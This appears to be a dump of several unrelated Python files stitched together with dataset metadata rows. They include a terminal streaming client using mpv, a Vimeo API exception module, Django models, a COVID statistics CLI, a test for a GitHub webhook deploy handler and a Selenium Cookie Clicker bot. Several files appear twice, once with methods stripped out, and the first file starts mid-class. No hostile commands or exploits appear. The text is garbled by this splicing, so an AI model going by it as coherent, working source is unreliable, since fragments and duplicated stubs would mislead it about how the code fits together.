self._media_info['season'] = season
@property
def _media_episode(self) -> int:
return self._media_info['episode']
@_media_episode.setter
def _media_episode(self, episode: int) -> None:
self._media_info['episode'] = episode
def _clear_media_info(self):
for key in self._media_info.keys():
self._media_info[key] = None
def choose_server(self):
if self.server != None:
return
su = ServerUtils()
servers = su.servers_list
servers_ids = [ dict(name=server['id']) for server in servers ]
answers = prompt([
{
'name': 'server_name',
'type': 'list',
'message': 'choose server: ',
'choices': servers_ids,
'when': lambda _: len(servers) > 1
}
])
try:
cls = su.get_class_by_id(answers['server_name'])
except KeyError:
print(
f"Selected {servers_ids[0]['name']}, 'cause there is only one server... ")
cls = su.get_class_by_id(servers_ids[0]['name'])
if cls == None:
print("Error on getting a class... ")
exit(1)
self.server = cls
def run(self, first_run: bool = True) -> None:
while True:
# get user commands
if not first_run:
clear_console()
self._clear_media_info()
if not self._continue("Continue: "):
break
first_run = False
search_options = self._get_search_options
if not search_options['search_key'] or not search_options['perform_search']:
continue
# edit media info
self._media_kind = search_options['media_type']
search_result = self.server.search(
search_options['search_key'], kind=self._media_kind)
chosed_media_slug = self._choose_media(search_result)
if self._media_kind == Kinds.MOVIES:
self._video_player(chosed_media_slug)
continue
elif self._media_kind == Kinds.SERIES:
episodes = self.server.getEpisodes(chosed_media_slug)
while True:
chosed_episode_slug = self._get_episode_slug(episodes)
self._video_player(chosed_episode_slug)
if self._continue(msg="do you wnat to play another episode: "):
clear_console()
continue
break
# since this is the end it will return to
#+ the beginning of the main loop, just like using continue
# MPV Video Player
def _video_player(self, slug: str, verbose: bool = False) -> None:
"""The video player method uses mpv as default. """
chosed_quality_url: str = self._choose_quality(slug)
trans_files: List = self._get_trans_files(slug)
cmd_args = ['mpv', ]
if chosed_quality_url == None:
return False
cmd_args.append(f"{chosed_quality_url}")
if len(trans_files) >= 1:
for t in trans_files:
cmd_args.append(f"--sub-file={t}")
# no terminal output
cmd_args.append("--no-terminal")
if verbose:
print('$ ' + ' '.join(cmd_args))
# Save screenshots to data folder, with seperating medias
# First make sure the data folder exist, if not make one
if not os.path.exists(Defaults.DATA_FOLDER):
os.mkdir(Defaults.DATA_FOLDER)
# check for screenshots folder existance, or make one
if not os.path.exists(Defaults.SCREENSHOTS_FOLDER):
os.mkdir(Defaults.SCREENSHOTS_FOLDER)
media_screenshots_path = os.path.join(
Defaults.SCREENSHOTS_FOLDER,
self._media_name
)
# check if the playing media have already folder, if not make one
if not os.path.exists(media_screenshots_path):
os.mkdir(media_screenshots_path)
# Set directory, and quality for screenshots
cmd_args.extend([
# The path screenshots saved to
f"--screenshot-directory={media_screenshots_path}",
f"--screenshot-jpeg-quality={100}",
])
# change screenshot filename template, and set media title
if self._media_kind == Kinds.MOVIES:
cmd_args.extend([
f"--screenshot-template=%P", # %p: Current playback time
f"--force-media-title={self._media_name}"
])
elif self._media_kind == Kinds.SERIES:
cmd_args.extend([
f"--screenshot-template=s{self._media_season}-e{self._media_episode}-%P",
f"--force-media-title={self._media_name} s{self._media_season} e{self._media_episode}",
])
# start playing the video
video_player = MPVVideoPlayer()
while True:
video_process: bool = video_player.play_video(cmd_args)
if video_process: # if process returned True
break # end the loop
# On error, Ask to retry playing the video
elif self._continue(msg="Error on playing the videos, Retry? "):
continue
else: # Else end the loop and return to the main loop
break
def _continue(self, default: bool = True, msg: str = "do you wanna to continue") -> bool:
choice = prompt([
{
'name': 'continue',
'type': 'confirm',
'message': msg,
'default': default
}
])
return choice['continue']
def _get_episode_slug(self, episodes: List) -> str:
seasons = {}
for s in episodes:
if s['season'] not in seasons.keys():
seasons[s['season']] = {}
this_season = seasons[s['season']]
if s['episode'] in this_season.keys():
continue
this_season[s['episode']] = s['slug']
season_number = self._media_season = self._get_season_number(seasons)
episode_number = self._media_episode = self._get_episode_number(seasons, season_number)
return seasons[season_number][episode_number]
def _get_trans_files(self, slug: str) -> List:
trans_list = self.server.getTranslations(slug)
_list = [ dict(
name=f"{tran['lang'].strip()} ({tran['extension'].strip()})",
fileURL=tran['fileURL'])
for tran in trans_list ]
choose_tran = prompt([
{
'name': 'trans',
'type': 'checkbox',
'message': 'choose on or more translation file: ',
'choices': [dict(name=tran['name'])
for tran in _list],
# 'validate': lambda choose_tran: 'You must choose at least one topping.' if len(choose_tran) == 0 else True
},
])
return [
i['fileURL'] for i in _list if i['name'] in choose_tran['trans']
]
def _get_season_number(self, seasons: dict) -> str:
# get the first season number
def default_season() -> str:
s_l_o_s = sorted([int(v) for v in seasons.keys()])[0]
return str(s_l_o_s)
while True:
chosed_season = prompt([
{
'name': 'season',
'type': 'input',
'message': f'choose season [{default_season()} - {len(seasons)}]',
'when': lambda _: (len(seasons) > 1),
},
])
try:
s_n = chosed_season['season']
# if choesn bigger >= first season number, and <= number of seasons
if int(s_n) >= int(default_season()) and int(s_n) <= len(seasons):
return s_n
except KeyError:
return default_season()
except ValueError:
print("Pleas Enter a number :(")
def _get_episode_number(self, seasons: dict, season_number) -> str:
# get the first episode number
def default_episode() -> str:
e_l_o_s = sorted([int(v)
for v in seasons[season_number].keys()])[0]
return str(e_l_o_s)
while True:
chosed_episode = prompt([
{
'name': 'episode',
'type': 'input',
'message': 'enter number',
'message': f"choose episode [1 - {len(seasons[season_number])}]",
'when': lambda _: (len(seasons[season_number]) > 1),
},
])
try:
e_n = chosed_episode['episode']
# if choesn bigger >= first episode number, and <= number of episodes
if (int(e_n) >= int(default_episode()) and
int(e_n) <= len((seasons[season_number]))):
return e_n
# if the user input is not number
except ValueError:
print("Pleas Enter a number :(")
# if there is just one episode
except KeyError:
return default_episode()
def _choose_quality(self, slug: str) -> str:
qualities = self.server.getVideos(slug)
choose_quality = prompt([
{
'name': 'quality',
'type': 'list',
'message': 'select video quality',
'choices': [dict(name=video['reso']) for video in qualities]
}
])
selected_quality = choose_quality['quality']
for i in qualities:
if i['reso'] == selected_quality:
return i['videoURL']
def _choose_media(self, media_list: List) -> str:
_list = [ dict(name=f"{media['name']} ({media['year']})", slug=media['slug'])
for media in media_list]
select_media = prompt([
{
'name': 'media_choice',
'message': 'select media: ',
'type': 'list',
'choices': _list
}
])
for i in _list:
if i['name'] == select_media['media_choice']:
# set_media_name
self._media_name = i['name']
return i['slug']
@property
def _get_search_options(self) -> dict[str, str, str]:
return prompt([
{
'name': 'search_key',
'type': 'input',
'message': 'Enter a name to search',
},
{
'name': 'media_type',
'type': 'list',
'message': 'select a media type: ',
'choices': [dict(name=type) for type in [Kinds.MOVIES, Kinds.SERIES]],
'when': lambda search_choices: search_choices['search_key'],
},
{
'name': 'perform_search',
'type': 'confirm',
'message': 'Press any key to perform search or n to reset',
'default': True,
'when': lambda search_choices: search_choices['search_key'],
}
])
if __name__ == '__main__':
main_app = Main()
main_app.run() | 9,245 | 412 | 589 |
0cadcd2fa3cacbc06fab2f302116618a959eb47e | 43 | py | Python | utest/resources/robotdata/resources/res_var_file.py | crylearner/RIDE3X | 767f45b0c908f18ecc7473208def8dc7489f43b0 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2017-08-20T14:46:02.000Z | 2017-08-20T14:46:02.000Z | utest/resources/robotdata/resources/res_var_file.py | crylearner/RIDE3X | 767f45b0c908f18ecc7473208def8dc7489f43b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | utest/resources/robotdata/resources/res_var_file.py | crylearner/RIDE3X | 767f45b0c908f18ecc7473208def8dc7489f43b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | var_from_resource_var_file = 'Some Value'
| 21.5 | 42 | 0.813953 | var_from_resource_var_file = 'Some Value'
| 0 | 0 | 0 |
83718cad3cccf90d4bb8b22c60ce46bec0b7be5f | 129 | py | Python | teste.py | nijuni2022/Projeto-Crud | 4f7d02381a360e5d80d9f1c31ef5a65f69729d62 | [
"MIT"
] | null | null | null | teste.py | nijuni2022/Projeto-Crud | 4f7d02381a360e5d80d9f1c31ef5a65f69729d62 | [
"MIT"
] | null | null | null | teste.py | nijuni2022/Projeto-Crud | 4f7d02381a360e5d80d9f1c31ef5a65f69729d62 | [
"MIT"
] | null | null | null | #from bson.objectid import ObjectId
from pymongo import MongoClient
client= MongoClient("localhost", 27017)
db = client.Dados | 16.125 | 39 | 0.790698 | #from bson.objectid import ObjectId
from pymongo import MongoClient
client= MongoClient("localhost", 27017)
db = client.Dados | 0 | 0 | 0 |
d52a6d9651816badaa28ac2f06b6daa5b87b8d9f | 5,290 | py | Python | vimeo/exceptions.py | mypresences/vimeo.py | 352a1b2e9a0757560d62bb1ac34953b95e4ab3a5 | [
"Apache-2.0"
] | 1 | 2020-12-15T20:45:20.000Z | 2020-12-15T20:45:20.000Z | vimeo/exceptions.py | mypresences/vimeo.py | 352a1b2e9a0757560d62bb1ac34953b95e4ab3a5 | [
"Apache-2.0"
] | null | null | null | vimeo/exceptions.py | mypresences/vimeo.py | 352a1b2e9a0757560d62bb1ac34953b95e4ab3a5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
class BaseVimeoException(Exception):
"""Base class for Vimeo Exceptions."""
def __init__(self, response, message):
"""Base Exception class init."""
# API error message
self.message = self.__get_message(response)
# HTTP status code
if type(response) is Exception:
self.status_code = 500
elif hasattr(response, 'status_code'):
self.status_code = response.status_code
else:
self.status_code = 500
super(BaseVimeoException, self).__init__(self.message)
class ObjectLoadFailure(Exception):
"""Object Load failure exception."""
def __init__(self, message):
"""Object Load failure exception init."""
super(ObjectLoadFailure, self).__init__(message)
class UploadQuotaExceeded(Exception):
"""Exception for upload quota execeeded."""
def __get_free_space(self, num):
"""Transform bytes in gigabytes."""
return 'Free space quota: %sGb' % (round((num / 1073741824.0), 1))
def __init__(self, free_quota, message):
"""Init method for this subclass of BaseVimeoException."""
message = message + self.__get_free_space(num=free_quota)
super(UploadQuotaExceeded, self).__init__(message)
class UploadAttemptCreationFailure(BaseVimeoException):
"""Exception for upload attempt creation failure."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(UploadAttemptCreationFailure, self).__init__(response, message)
class UploadTicketCreationFailure(BaseVimeoException):
"""Exception for upload ticket creation failure."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(UploadTicketCreationFailure, self).__init__(response, message)
class VideoCreationFailure(BaseVimeoException):
"""Exception for failure on the delete during the upload."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(VideoCreationFailure, self).__init__(response, message)
class VideoUploadFailure(BaseVimeoException):
"""Exception for failures during the actual upload od the file."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(VideoUploadFailure, self).__init__(response, message)
class PictureCreationFailure(BaseVimeoException):
"""Exception for failure on initial request to upload a picture."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(PictureCreationFailure, self).__init__(response, message)
class PictureUploadFailure(BaseVimeoException):
"""Exception for failure on the actual upload of the file."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(PictureUploadFailure, self).__init__(response, message)
class PictureActivationFailure(BaseVimeoException):
"""Exception for failure on activating the picture."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(PictureActivationFailure, self).__init__(response, message)
class TexttrackCreationFailure(BaseVimeoException):
"""Exception for failure on the initial request to upload a text track."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(TexttrackCreationFailure, self).__init__(response, message)
class TexttrackUploadFailure(BaseVimeoException):
"""Exception for failure on the actual upload of the file."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(TexttrackUploadFailure, self).__init__(response, message)
class APIRateLimitExceededFailure(BaseVimeoException):
"""Exception used when the user has exceeded the API rate limit."""
| 34.575163 | 93 | 0.677694 | #!/usr/bin/env python
class BaseVimeoException(Exception):
"""Base class for Vimeo Exceptions."""
def __get_message(self, response):
if type(response) is Exception:
return response.message
json = None
try:
json = response.json()
except Exception:
pass
if json:
message = json.get('error') or json.get('Description')
elif hasattr(response, 'text'):
response_message = getattr(response, 'message', 'There was an unexpected error.')
message = getattr(response, 'text', response_message)
else:
message = getattr(response, 'message')
return message
def __init__(self, response, message):
"""Base Exception class init."""
# API error message
self.message = self.__get_message(response)
# HTTP status code
if type(response) is Exception:
self.status_code = 500
elif hasattr(response, 'status_code'):
self.status_code = response.status_code
else:
self.status_code = 500
super(BaseVimeoException, self).__init__(self.message)
class ObjectLoadFailure(Exception):
"""Object Load failure exception."""
def __init__(self, message):
"""Object Load failure exception init."""
super(ObjectLoadFailure, self).__init__(message)
class UploadQuotaExceeded(Exception):
"""Exception for upload quota execeeded."""
def __get_free_space(self, num):
"""Transform bytes in gigabytes."""
return 'Free space quota: %sGb' % (round((num / 1073741824.0), 1))
def __init__(self, free_quota, message):
"""Init method for this subclass of BaseVimeoException."""
message = message + self.__get_free_space(num=free_quota)
super(UploadQuotaExceeded, self).__init__(message)
class UploadAttemptCreationFailure(BaseVimeoException):
"""Exception for upload attempt creation failure."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(UploadAttemptCreationFailure, self).__init__(response, message)
class UploadTicketCreationFailure(BaseVimeoException):
"""Exception for upload ticket creation failure."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(UploadTicketCreationFailure, self).__init__(response, message)
class VideoCreationFailure(BaseVimeoException):
"""Exception for failure on the delete during the upload."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(VideoCreationFailure, self).__init__(response, message)
class VideoUploadFailure(BaseVimeoException):
"""Exception for failures during the actual upload od the file."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(VideoUploadFailure, self).__init__(response, message)
class PictureCreationFailure(BaseVimeoException):
"""Exception for failure on initial request to upload a picture."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(PictureCreationFailure, self).__init__(response, message)
class PictureUploadFailure(BaseVimeoException):
"""Exception for failure on the actual upload of the file."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(PictureUploadFailure, self).__init__(response, message)
class PictureActivationFailure(BaseVimeoException):
"""Exception for failure on activating the picture."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(PictureActivationFailure, self).__init__(response, message)
class TexttrackCreationFailure(BaseVimeoException):
"""Exception for failure on the initial request to upload a text track."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(TexttrackCreationFailure, self).__init__(response, message)
class TexttrackUploadFailure(BaseVimeoException):
"""Exception for failure on the actual upload of the file."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(TexttrackUploadFailure, self).__init__(response, message)
class APIRateLimitExceededFailure(BaseVimeoException):
"""Exception used when the user has exceeded the API rate limit."""
def __get_message(self, response):
guidelines = 'https://developer.vimeo.com/guidelines/rate-limiting'
message = super(APIRateLimitExceededFailure, self).__get_message(
response
)
limit_reset_time = response.headers.get('x-ratelimit-reset')
if limit_reset_time:
text = '{} \n limit will reset on: {}.\n About this limit: {}'
message = text.format(
message,
limit_reset_time,
guidelines
)
return message
| 1,100 | 0 | 54 |
ebcd35c8dfad509890ef96bd37be1ab49e9e3128 | 77 | py | Python | main.py | akshayvaidya/python-calculator | d07272b8ba8f15ebec0eb516673bde39138d5987 | [
"MIT"
] | null | null | null | main.py | akshayvaidya/python-calculator | d07272b8ba8f15ebec0eb516673bde39138d5987 | [
"MIT"
] | null | null | null | main.py | akshayvaidya/python-calculator | d07272b8ba8f15ebec0eb516673bde39138d5987 | [
"MIT"
] | null | null | null | from calculator import calculator
if __name__=='__main__':
calculator()
| 15.4 | 33 | 0.753247 | from calculator import calculator
if __name__=='__main__':
calculator()
| 0 | 0 | 0 |
89a146782b6ab2661257124e9041ce278d8d11af | 772 | py | Python | experiment_files/punch-cpe_cuestim.py | mwaskom/Waskom_CerebCortex_2017 | 1f582917258afbe234f1e72d4eabb8dc8c719f41 | [
"Unlicense"
] | 12 | 2017-09-15T15:32:15.000Z | 2021-06-13T04:29:04.000Z | experiment_files/punch-cpe_cuestim.py | WagnerLabPapers/Waskom_CerebCortex_InPress | e5a7de82f47362b909478d842673bd364b8d918e | [
"Unlicense"
] | null | null | null | experiment_files/punch-cpe_cuestim.py | WagnerLabPapers/Waskom_CerebCortex_InPress | e5a7de82f47362b909478d842673bd364b8d918e | [
"Unlicense"
] | 5 | 2017-09-20T00:20:15.000Z | 2022-03-21T11:28:46.000Z | """
Parametric design with CPE modeled separately for cue and stimulus periods.
"""
design_name = "cpe_cuestim"
condition_names = ["cue", "stim",
"cpe_cue", "cpe_stim",
"error", "response_time"]
temporal_deriv = True
confound_pca = True
contrasts = [
("cue_neg", ["cue"], [-1]),
("stim_neg", ["stim"], [-1]),
("cpe_cue_neg", ["cpe_cue"], [-1]),
("cpe_stim_neg", ["cpe_stim"], [-1]),
("cue-stim", ["cue", "stim"], [1, -1]),
("stim-cue", ["cue", "stim"], [-1, 1]),
("cpe_cue-stim", ["cpe_cue", "cpe_stim"], [1, -1]),
("cpe_stim-cue", ["cpe_cue", "cpe_stim"], [-1, 1]),
]
sampling_range = (.5, .5, 1)
surf_smooth = 6
| 30.88 | 75 | 0.472798 | """
Parametric design with CPE modeled separately for cue and stimulus periods.
"""
design_name = "cpe_cuestim"
condition_names = ["cue", "stim",
"cpe_cue", "cpe_stim",
"error", "response_time"]
temporal_deriv = True
confound_pca = True
contrasts = [
("cue_neg", ["cue"], [-1]),
("stim_neg", ["stim"], [-1]),
("cpe_cue_neg", ["cpe_cue"], [-1]),
("cpe_stim_neg", ["cpe_stim"], [-1]),
("cue-stim", ["cue", "stim"], [1, -1]),
("stim-cue", ["cue", "stim"], [-1, 1]),
("cpe_cue-stim", ["cpe_cue", "cpe_stim"], [1, -1]),
("cpe_stim-cue", ["cpe_cue", "cpe_stim"], [-1, 1]),
]
sampling_range = (.5, .5, 1)
surf_smooth = 6
| 0 | 0 | 0 |
44a6bf400cccb033ac68d44f5d1b8e4fde08245c | 972 | py | Python | users/models.py | olubiyiontheweb/dockerized_admin_dashboard | 50e224550f66adabdfe1bc3867fb68d419d9c99b | [
"MIT"
] | null | null | null | users/models.py | olubiyiontheweb/dockerized_admin_dashboard | 50e224550f66adabdfe1bc3867fb68d419d9c99b | [
"MIT"
] | null | null | null | users/models.py | olubiyiontheweb/dockerized_admin_dashboard | 50e224550f66adabdfe1bc3867fb68d419d9c99b | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import AbstractUser, AbstractBaseUser
# Create your models here.
| 32.4 | 72 | 0.75823 | from django.db import models
from django.contrib.auth.models import AbstractUser, AbstractBaseUser
# Create your models here.
class Permission(models.Model):
name = models.CharField(max_length=200)
class Role(models.Model):
name = models.CharField(max_length=200)
permissions = models.ManyToManyField(Permission)
class User(AbstractUser):
username = models.CharField(max_length=150, null=True)
first_name = models.CharField(max_length=200)
last_name = models.CharField(max_length=200)
email = models.CharField(max_length=200, unique=True)
password = models.CharField(max_length=200)
role = models.ForeignKey(Role, on_delete=models.SET_NULL, null=True)
is_superuser = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
date_joined = models.DateTimeField(auto_now_add=True)
USERNAME_FIELD = "email"
REQUIRED_FIELDS = ["username"]
| 0 | 773 | 69 |
b0d2c589d7c570142c12c27762103472956c016b | 196 | py | Python | cleanup_later/management/commands/cleanup_later.py | mtskelton/django-cleanup-later | 79b99a413223a15b614fa585d2a557894ff8e952 | [
"MIT"
] | 1 | 2019-08-02T11:42:05.000Z | 2019-08-02T11:42:05.000Z | cleanup_later/management/commands/cleanup_later.py | mtskelton/django-cleanup-later | 79b99a413223a15b614fa585d2a557894ff8e952 | [
"MIT"
] | null | null | null | cleanup_later/management/commands/cleanup_later.py | mtskelton/django-cleanup-later | 79b99a413223a15b614fa585d2a557894ff8e952 | [
"MIT"
] | null | null | null | from django.core.management.base import BaseCommand
from cleanup_later.models import CleanupFile
| 24.5 | 51 | 0.760204 | from django.core.management.base import BaseCommand
from cleanup_later.models import CleanupFile
class Command(BaseCommand):
def handle(self, *args, **kwargs):
CleanupFile.cleanup()
| 43 | 6 | 49 |
69c82a946030df0018ad8fb9dd6e2805913e6643 | 4,506 | py | Python | covidtracker/covid.py | shubraj/covidTracker | f1a6ef3911651733c08d8c0212744e97acbd6c00 | [
"MIT"
] | null | null | null | covidtracker/covid.py | shubraj/covidTracker | f1a6ef3911651733c08d8c0212744e97acbd6c00 | [
"MIT"
] | null | null | null | covidtracker/covid.py | shubraj/covidTracker | f1a6ef3911651733c08d8c0212744e97acbd6c00 | [
"MIT"
] | null | null | null | #! /usr/bin/python3
import requests,argparse,sys,colorama,pyfiglet
from colorama import Fore,Style
if __name__ == "__main__":
Covid().stats | 51.204545 | 122 | 0.576787 | #! /usr/bin/python3
import requests,argparse,sys,colorama,pyfiglet
from colorama import Fore,Style
class Covid:
colorama.init(autoreset=True)
parser = argparse.ArgumentParser(description="View By Country")
parser.add_argument("country",nargs="?",metavar="",type=str,help="radius")
parser.add_argument("-d","--deaths",action="store_true",help="deaths")
parser.add_argument("-c","--cases",action="store_true",help="total cases")
parser.add_argument("-g","--todayCases",action="store_true",help="today cases")
parser.add_argument("-f","--deathsToday",action="store_true",help="deaths")
parser.add_argument("-r","--recovered",action="store_true",help="recovered")
parser.add_argument("-e","--todayRecovered",action="store_true",help="todayRecovered")
parser.add_argument("-b","--critical",action="store_true",help="critical")
parser.add_argument("-a","--active",action="store_true",help="active")
parser.add_argument("-i","--tests",action="store_true",help="tests")
parser.add_argument("-t","--today",action="store_true",help="today's cases")
args = parser.parse_args()
base_url = "https://disease.sh/v3/covid-19/"
def _myLocation(self):
response = requests.get("https://freegeoip.app/json/")
if response.status_code == 200:
country = response.json().get('country_name')
return country
def _getResponse(self,endpoint):
response = requests.get(endpoint)
if response.status_code == 200:
return response.json()
@staticmethod
def printOut(arg,value):
if arg != "country":
sys.stdout.write(f"{Fore.RED}[+] {Fore.BLUE}{Style.BRIGHT}{arg}: {Fore.WHITE}{Style.BRIGHT}{int(value):,} \n")
else:
sys.stdout.write(f"{Fore.RED}[+] {Fore.BLUE}{Style.BRIGHT}{arg}: {Fore.WHITE}{Style.BRIGHT}{value} \n")
sys.stdout.flush()
@property
def stats(self):
mycountry = self.args.country if self.args.country else self._myLocation()
if mycountry:
args_status = False
json_response = self._getResponse(f"{self.base_url}countries/{mycountry}")
sys.stdout.write(pyfiglet.figlet_format("Covid Tracker",justify="center"))
sys.stdout.flush()
if json_response:
if self.args.cases:
self.printOut("cases",json_response.get("cases"))
args_status = True
if self.args.deaths:
self.printOut("deaths",json_response.get("deaths"))
args_status = True
if self.args.recovered:
self.printOut("recovered",json_response.get("recovered"))
args_status = True
if self.args.critical:
self.printOut("critical",json_response.get("deaths"))
args_status = True
if self.args.active:
self.printOut("active",json_response.get("active"))
args_status = True
if self.args.tests:
self.printOut("tests",json_response.get("tests"))
args_status = True
if self.args.today:
self.printOut("todayCases",json_response.get("todayCases"))
self.printOut("todayRecovered",json_response.get("todayRecovered"))
self.printOut("deathsToday",json_response.get("todayDeaths"))
args_status = True
else:
if self.args.todayCases:
self.printOut("todayCases",json_response.get("todayCases"))
args_status = True
if self.args.deathsToday:
self.printOut("deathsToday",json_response.get("todayDeaths"))
args_status = True
if self.args.todayRecovered:
self.printOut("todayRecovered",json_response.get("todayRecovered"))
args_status = True
if not args_status:
exclude = ("updated","countryInfo","undefined","continent")
for key in exclude:
json_response.pop(key)
for key in json_response:
self.printOut(key,json_response[key])
else:
sys.exit("something went wrong")
if __name__ == "__main__":
Covid().stats | 3,153 | 1,187 | 23 |
76e8b7b6c75bc8b4098b65e168d8de336da3c675 | 19 | py | Python | olamundo.py | adrianomdantas/Exercicios-Python | ef5025a186615258aec0cf35ed839fe49577d983 | [
"MIT"
] | null | null | null | olamundo.py | adrianomdantas/Exercicios-Python | ef5025a186615258aec0cf35ed839fe49577d983 | [
"MIT"
] | null | null | null | olamundo.py | adrianomdantas/Exercicios-Python | ef5025a186615258aec0cf35ed839fe49577d983 | [
"MIT"
] | null | null | null | print('olá mundo')
| 9.5 | 18 | 0.684211 | print('olá mundo')
| 0 | 0 | 0 |
752acca83420a261615db438667ac9dfb606fb95 | 2,057 | py | Python | gitd/core/tests/test_github_handler.py | vitorfs/gitd | 8ab1091b986409127ed3f77676b92d64fbb2a52e | [
"MIT"
] | 4 | 2020-11-01T22:57:50.000Z | 2020-11-27T16:25:05.000Z | gitd/core/tests/test_github_handler.py | vitorfs/gitd | 8ab1091b986409127ed3f77676b92d64fbb2a52e | [
"MIT"
] | null | null | null | gitd/core/tests/test_github_handler.py | vitorfs/gitd | 8ab1091b986409127ed3f77676b92d64fbb2a52e | [
"MIT"
] | 1 | 2021-02-16T20:58:15.000Z | 2021-02-16T20:58:15.000Z | import uuid
from django.test import TestCase, override_settings
from gitd.core.constants import GitHubEvents
from gitd.core.exceptions import GitHubException
from gitd.core.handlers import github_handler
from gitd.core.models import Deployment
| 43.765957 | 117 | 0.703452 | import uuid
from django.test import TestCase, override_settings
from gitd.core.constants import GitHubEvents
from gitd.core.exceptions import GitHubException
from gitd.core.handlers import github_handler
from gitd.core.models import Deployment
class TestGitHubHandler(TestCase):
def test_ping(self):
expected = "pong"
actual = github_handler({}, GitHubEvents.PING, str(uuid.uuid4()))
self.assertEqual(expected, actual)
@override_settings(GITHUB_REPOSITORY="example/example")
def test_deploy_bad_repo(self):
data = {"repository": {"full_name": "example/bad-example"}}
with self.assertRaisesMessage(GitHubException, "Invalid repository."):
github_handler(data, GitHubEvents.PUSH, str(uuid.uuid4()))
@override_settings(GITHUB_REPOSITORY="example/example", GITHUB_BRANCH="refs/heads/main")
def test_deploy_bad_branch(self):
data = {"ref": "refs/heads/dev", "repository": {"full_name": "example/example"}}
expected = "Event ignored because it was not pushed to refs/heads/main."
actual = github_handler(data, GitHubEvents.PUSH, str(uuid.uuid4()))
self.assertEqual(expected, actual)
@override_settings(
GITHUB_REPOSITORY="example/example", GITHUB_BRANCH="refs/heads/main", GITD_DEPLOYMENT_COMMAND="echo 'deploy'"
)
def test_deploy_successful(self):
data = {"ref": "refs/heads/main", "repository": {"full_name": "example/example"}}
self.assertEqual(0, Deployment.objects.count())
delivery_id = str(uuid.uuid4())
actual = github_handler(data, GitHubEvents.PUSH, delivery_id)
deployment = Deployment.objects.first()
expected = "Deployment started with id %s." % deployment.pk
self.assertEqual(expected, actual)
self.assertIsNotNone(deployment)
self.assertEqual(delivery_id, deployment.delivery)
def test_bad_event(self):
with self.assertRaisesMessage(GitHubException, "Invalid event."):
github_handler({}, "BAD_EVENT", str(uuid.uuid4()))
| 1,339 | 448 | 23 |
7062857693723d59531fd8a709551db00b6e328b | 92 | py | Python | web_MNIST/apps.py | lorenzophys/django-web-MNIST | 5219fa9c1858cabd910dce5fdcce7bf8988ff8a2 | [
"MIT"
] | null | null | null | web_MNIST/apps.py | lorenzophys/django-web-MNIST | 5219fa9c1858cabd910dce5fdcce7bf8988ff8a2 | [
"MIT"
] | null | null | null | web_MNIST/apps.py | lorenzophys/django-web-MNIST | 5219fa9c1858cabd910dce5fdcce7bf8988ff8a2 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 15.333333 | 33 | 0.76087 | from django.apps import AppConfig
class WebMnistConfig(AppConfig):
name = 'web_MNIST'
| 0 | 34 | 23 |
084ec0011d47d9536c75eb288f729b41dd67fc53 | 1,038 | py | Python | cookieClicker.py | fredericoqueiroz/automated-cookie-clicker | 16e65b51b234cca6a31617d9d29682eea2dccae7 | [
"MIT"
] | null | null | null | cookieClicker.py | fredericoqueiroz/automated-cookie-clicker | 16e65b51b234cca6a31617d9d29682eea2dccae7 | [
"MIT"
] | null | null | null | cookieClicker.py | fredericoqueiroz/automated-cookie-clicker | 16e65b51b234cca6a31617d9d29682eea2dccae7 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
PATH = "C:\Program Files (x86)\chromedriver.exe"
driver = webdriver.Chrome(PATH)
driver.get("https://orteil.dashnet.org/cookieclicker/")
driver.implicitly_wait(5)
cookie = driver.find_element_by_id("bigCookie")
cookie_count = driver.find_element_by_id("cookies")
items = [[driver.find_element_by_id("productName" + str(i)), driver.find_element_by_id("productPrice" + str(i))] for i in range(3, -1, -1)]
#print(items)
actions = ActionChains(driver)
actions.click(cookie)
for i in range(2000):
actions.perform()
count = int(cookie_count.text.split(" ")[0])
for item_name, item_value in items:
value = int(item_value.text)
if value <= count:
building_actions = ActionChains(driver)
building_actions.move_to_element(item_name)
building_actions.click()
building_actions.perform()
print("Just bought {} for {} cookies...".format(item_name.text, value))
| 33.483871 | 139 | 0.705202 | from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
PATH = "C:\Program Files (x86)\chromedriver.exe"
driver = webdriver.Chrome(PATH)
driver.get("https://orteil.dashnet.org/cookieclicker/")
driver.implicitly_wait(5)
cookie = driver.find_element_by_id("bigCookie")
cookie_count = driver.find_element_by_id("cookies")
items = [[driver.find_element_by_id("productName" + str(i)), driver.find_element_by_id("productPrice" + str(i))] for i in range(3, -1, -1)]
#print(items)
actions = ActionChains(driver)
actions.click(cookie)
for i in range(2000):
actions.perform()
count = int(cookie_count.text.split(" ")[0])
for item_name, item_value in items:
value = int(item_value.text)
if value <= count:
building_actions = ActionChains(driver)
building_actions.move_to_element(item_name)
building_actions.click()
building_actions.perform()
print("Just bought {} for {} cookies...".format(item_name.text, value))
| 0 | 0 | 0 |
